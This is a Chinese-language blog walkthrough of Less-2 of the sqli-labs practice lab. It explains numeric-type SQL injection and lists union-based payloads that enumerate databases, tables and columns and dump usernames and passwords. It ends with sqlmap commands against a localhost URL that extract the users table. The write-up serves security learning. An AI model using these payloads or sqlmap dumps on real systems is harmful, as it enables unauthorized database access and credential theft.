前言:

今天做第二关。

正文:

打开第二关页面如下:
在这里插入图片描述
(1)找注入点:
还是一样,试一下id,我上篇文章忘记说了,第一关是字符型,一开始判断注入类型,是字符型还是数字型,字符型就是id是一个字符串,如果是字符串的话,在数据库里就有一个单引号,这个时候再注入的时候就需要对SQL进行闭合,具体体现就是在id=1后面加个单引号。数字型就是在SQL语句中id=数字,然后在进行注入的时候,就不需要单引号闭合,如果闭合的话,就会一直报错。
这个时候输入以前的payload

?id=1'
?id=1''

都会报错。这个时候我们只需要把单引号去掉就行。
(2)找列

?id=1 order by 2
?id=1 order by 3
?id=1 order by 4

在这里插入图片描述
说明是3列。
(3)找数据库名

?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata

在这里插入图片描述

(4)找表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述
(5)找列名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

在这里插入图片描述
(5)找数据

?id=-1 union select 1,group_concat(username),group_concat(password) from security.users

在这里插入图片描述

用sqlmap跑一下:

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 --dbs

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 -D security --tables

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 -D security -T users --column

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 -D security -T users -C id,password,username --dump

在这里插入图片描述

点赞(0) 打赏

评论列表 共有 0 条评论

暂无评论

微信公众账号

微信扫一扫加关注

发表
评论
返回
顶部